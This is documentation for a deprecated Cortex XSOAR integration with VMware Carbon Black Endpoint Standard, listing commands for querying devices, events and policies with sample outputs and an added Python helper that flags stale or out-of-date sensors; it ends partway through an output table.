VMware Carbon Black Endpoint Standard (Deprecated)
This Integration is part of the Carbon Black Endpoint Standard Pack.
Deprecated
Use Carbon Black Endpoint Standard instead.
Overview
Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Cortex XSOAR.
Use cases
- Get information about events, policies, devices, and processes on Carbon Black.
- Update events, policies, devices, and processes on Carbon Black.
- Delete rules from policies.
- Create new policies.
Configure VMware Carbon Black Endpoint Standard on Cortex XSOAR
- Navigate to Settings > Integrations > Servers & Services.
- Search for VMware Carbon Black Endpoint Standard.
- Click Add instance to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
- Click Test to validate the URLs, token, and connection.
Commands
- Get the status of multiple devices: cbd-get-devices-status
- Get the status of a specified device: cbd-get-device-status
- Change the security policy assigned to a device: cbd-change-device-status
- Get multiple events: cbd-find-events
- Get a specified event: cbd-find-event
- Get multiple processes: cbd-find-processes
- Get alert details: cbd-get-alert-details
- Get all policy details: cbd-get-policies
- Get the details of a specified policy: cbd-get-policy
- Create a policy: cbd-create-policy
- Update a policy: cbd-update-policy
- Delete a policy: cbd-delete-policy
- Add a rule to a policy: cbd-add-rule-to-policy
- Delete a rule from a policy: cbd-delete-rule-from-policy
- Update a rule in a policy: cbd-update-rule-in-policy
- Set a policy: cbd-set-policy
Get the status of multiple devices
Retrieves the status of multiple devices, as specified by further input.
Base Command
cbd-get-devices-status
Input
| Parameter | Description | More Information |
|---|---|---|
| hostName | Host name of the device to search for | Case insensitive |
| hostNameExact | Exact host name of the device to search for | Case sensitive |
| ownerName | Device owner name | Case insensitive |
| ownerNameExact | Exact device owner name | Case sensitive |
| ipAddress | External or internal IP address of the device to search for | - |
| start | Shows results from this row onward | - |
| rows | Maximum number of rows of results | This parameter can be limited on the Cb Defense server side |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime | Activation code expiry time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastLocation | Last location |
| CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime | Last shutdown time |
| CarbonBlackDefense.GetDevicesStatus.Results.OsVersion | Operating system version |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyId | Policy ID |
| CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime | Registered time |
| CarbonBlackDefense.GetDevicesStatus.Results.Status | Status |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceId | Device ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId | Device owner ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceType | Device type |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDevicesStatus.Results.Email | Email address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastContact | Last contact |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName | Organization name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorStates | Sensor states |
| CarbonBlackDefense.GetDevicesStatus.Results.AvStatus | AV status |
| CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.Name | Name |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyName | Policy name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDevicesStatus.Results.TestId | Test ID |
Command Example
!cbd-get-devices-status rows="1"
Context Example
CarbonBlackDefense:{} 1 item
GetDevicesStatus:{} 1 item
Results:{} 25 items
ActivationCodeExpiryTime:1524157210454
AvStatus:null
LastContact:1533646970617
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | 1524157210454 |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| Email | cberninger |
| LastContact | 1533646970617 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
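A triage helper for the Results entries of this command, as an added example that is not part of the integration's own code: it converts the epoch-millisecond timestamps shown above, flags sensors that are out of date, silent for longer than an assumed seven-day window, or not in the ACTIVE state, and runs on a constructed sample modelled on the context example. In an XSOAR automation the input would come from the CarbonBlackDefense.GetDevicesStatus.Results context rather than the inline sample.

```python
from datetime import datetime, timedelta, timezone

# Assumption: a sensor that has not checked in for this long is considered stale.
STALE_AFTER = timedelta(days=7)


def ms_to_datetime(epoch_ms):
    """Convert a Carbon Black epoch-millisecond timestamp (e.g. LastContact) to UTC."""
    if epoch_ms is None:
        return None
    return datetime.fromtimestamp(epoch_ms / 1000, tz=timezone.utc)


def triage_device(device, now):
    """Return a list of findings for one Results entry; an empty list means healthy."""
    findings = []
    if device.get("SensorOutOfDate"):
        findings.append("sensor out of date (SensorVersion %s)" % device.get("SensorVersion"))
    last_contact = ms_to_datetime(device.get("LastContact"))
    if last_contact is None:
        findings.append("no LastContact recorded")
    elif now - last_contact > STALE_AFTER:
        findings.append("no contact for %d days" % (now - last_contact).days)
    states = device.get("SensorStates") or []
    if "ACTIVE" not in states:
        findings.append("sensor not ACTIVE (states: %s)" % ",".join(states))
    if device.get("Status") != "REGISTERED":
        findings.append("device status is %s" % device.get("Status"))
    return findings


def triage_devices(results, now=None):
    """Map DeviceId -> {Name, PolicyName, Findings} for every device with findings."""
    now = now or datetime.now(timezone.utc)
    report = {}
    for device in results:
        findings = triage_device(device, now)
        if findings:
            report[device["DeviceId"]] = {
                "Name": device.get("Name"),
                "PolicyName": device.get("PolicyName"),
                "Findings": findings,
            }
    return report


# Constructed sample: the first entry mirrors the Results entry in the context example
# above; the second is a made-up stale, out-of-date sensor (hypothetical device).
SAMPLE_RESULTS = [
    {
        "DeviceId": 844355, "Name": "cberninger-mac2", "PolicyName": "default",
        "Status": "REGISTERED", "SensorVersion": "3.0.2.8", "SensorOutOfDate": False,
        "LastContact": 1533646970617,
        "SensorStates": ["ACTIVE", "LIVE_RESPONSE_NOT_RUNNING", "LIVE_RESPONSE_NOT_KILLED",
                         "LIVE_RESPONSE_DISABLED", "SECURITY_CENTER_OPTLN_DISABLED"],
    },
    {
        "DeviceId": 900001, "Name": "example-win-01", "PolicyName": "default",
        "Status": "REGISTERED", "SensorVersion": "3.0.0.1", "SensorOutOfDate": True,
        "LastContact": 1532400000000,
        "SensorStates": ["LIVE_RESPONSE_NOT_RUNNING"],
    },
]

# Fixed reference time (the day after the sample's LastContact) so results are reproducible.
AS_OF = datetime(2018, 8, 8, 12, 0, tzinfo=timezone.utc)


def sample_report():
    """Run the triage over the constructed sample at the fixed reference time."""
    return triage_devices(SAMPLE_RESULTS, now=AS_OF)


if __name__ == "__main__":
    for device_id, entry in sample_report().items():
        print(device_id, entry["Name"], "->", "; ".join(entry["Findings"]))
```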
Get the status of a specified device
Retrieves the status of a specified device.
Base Command
cbd-get-device-status
Input
| Parameter | Description |
|---|---|
| deviceId | Individual device ID |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | AV status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Time of registration |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted by analytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted by analytics time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-get-device-status deviceId="844355"
Context Example
CarbonBlackDefense:{} 1 item
GetDeviceStatus:{} 1 item
DeviceInfo:{} 25 items
ActivationCodeExpiryTime:null
AvStatus:null
LastContact:1533648166041
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| Email | cberninger |
| LastContact | 1533648166041 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
Change the security policy assigned to a device
Changes the security policy assigned to a specified device.
Base Command
cbd-change-device-status
Input
| Parameter | Description |
|---|---|
| deviceId | The device ID |
| policyId | The policy ID |
| policyName | The policy name |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | Anti-virus status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Registration time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted by analytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted by analytics time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Time of last report |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-change-device-status deviceId="844355" policyName="default"
Context Example
CarbonBlackDefense:{} 1 item
ChangeDeviceStatus:{} 1 item
DeviceInfo:{} 24 items
AvStatus:null
LastContact:1533648445513
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| AvStatus | |
|---|---|
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| Email | cberninger |
| LastContact | 1533648445513 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
| SensorStates | ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED |
Get multiple events
Returns multiple event details, as specified by further input.
Base Command
cbd-find-events
Input
| Parameter | Description | More Information |
|---|---|---|
| hostName | The host name of the event to search for | Case insensitive. |
| hostNameExact | The exact host name of the event to find | Case sensitive. |
| ownerName | Owner name of the event to search for | Case insensitive. |
| ownerNameExact | The exact owner name of the event to search for | Case sensitive. |
| ipAddress | External or internal IP address | - |
| sha256hash | Searches for events generated by a process with this SHA-256 hash | Must be in lowercase. |
| applicationName | Searches for events generated by a process with this application name | Must be in lowercase. |
| eventType | Searches for events associated with this event type | - |
| searchWindow | Events generated within this time frame | Default is one day. Events might not be available after 30 days due to retention policies. |
| start | Shows results from this row onward | - |
| rows | Maximum number of rows of results | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.FindEvents.Results.EventType | Event type |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart | Milliseconds since the beginning of the process |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name | Name |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.FindEvents.Results.ShortDescription | Short description |
| CarbonBlackDefense.FindEvents.Results.CreateTime | Time of creation |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName | Policy name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation | Agent location |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address | IpV4 address of the device |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email | Email address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.FindEvents.Results.EventId | Event ID |
| CarbonBlackDefense.FindEvents.Results.EventTime | Event time |
| CarbonBlackDefense.FindEvents.Results.LongDescription | Long description |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress | Dest address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort | Dest port |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn | Peer FQDN |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress | Peer IP address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address | Peer IpV4 address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.Service | Service |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress | Source address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort | Source port |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName | Application name |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath | Application path |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash | MD5 hash |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.FindEvents.Results.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-events rows=1
Context Example
CarbonBlackDefense:{} 1 item
FindEvents:{} 2 items
Results:{} 10 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
SelectedApp:{} 7 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
EffectiveReputation:LOCAL_WHITE
EffectiveReputationSource:PRE_EXISTING
Md5Hash:b43632f807770d141008deb988a65ad9
ReputationProperty:NOT_LISTED
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 12 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceLocation:{} 6 items
City:null
CountryCode:US
CountryName:United States
Latitude:37.751007
Longitude:-97.822
Region:null
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
PolicyName:default
TargetApp:{} 5 items
ApplicationName:null
EffectiveReputation:null
EffectiveReputationSource:null
ReputationProperty:null
Sha256Hash:null
ProcessDetails:{} 11 items
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
MilisSinceProcessStart:147443253
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
TotalResults:{} 1 item
TotalResults:10666
Endpoint:{} 4 items
Domain:null
Hostname:cberninger-mac2
IPAddress:67.143.208.113
OS:MAC
Process:{} 9 items
Path:null
SHA1:null
ParentID:null
PID:1071
Name:cloud-drive-ui
Endpoint:null
ParentName:null
MD5:null
CommandLine:null
Human Readable Output
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
| DeviceDetails PolicyName | default |
| DeviceDetails TargetPriorityCode | 1 |
| DeviceDetails TargetPriorityType | MEDIUM |
| EventId | 4ad25ae99a4911e88515b3c49ffeda59 |
| EventTime | 1533649991975 |
Get a specified event
Returns the details of a specified event.
Base Command
cbd-find-event
Input
| Parameter | Description |
|---|---|
| eventId | Event ID |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription | Short description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash | MD5 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId | Organization ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName | Organization name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType | Organization type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address | Device IpV4 address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email | Email address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation | Agent location path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName | Device host name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName | Group name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName | Full user name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name | Name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine | Parent command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine | Command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart | Milliseconds since process start |
